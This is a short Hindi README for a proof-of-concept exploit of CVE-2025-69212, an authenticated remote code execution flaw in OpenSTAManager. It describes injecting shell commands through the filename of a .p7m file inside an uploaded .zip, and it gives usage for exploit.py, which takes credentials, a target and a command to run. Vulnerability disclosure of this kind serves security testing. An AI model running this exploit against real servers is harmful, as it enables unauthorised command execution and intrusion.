
CVE-2025-69212 प्रूफ-ऑफ-कॉन्सेप्ट।
OpenSTAManager तकनीकी सहायता, इलेक्ट्रॉनिक इनवॉइसिंग और लेखांकन के लिए एक प्रबंधन सॉफ्टवेयर समाधान है। संस्करण <=2.9.8 एक प्रमाणित रिमोट कोड निष्पादन भेद्यता के प्रति संवेदनशील हैं। एक हमलावर एक विशेष रूप से तैयार .zip आर्काइव अपलोड करके इस समस्या का शोषण कर सकता है, जिसमें एक .p7m फ़ाइल होती है जिसका फ़ाइलनाम शेल कमांड के रूप में व्याख्या किया जा सकता है, जिसके परिणामस्वरूप रिमोट सर्वर पर मनमाना कमांड निष्पादन होता है।
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
उदाहरण:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help show this help message and exit
--user USER username for auth.
--password PASSWORD password for auth.
--target TARGET target domain endpoint
--cmd CMD command to execute on the server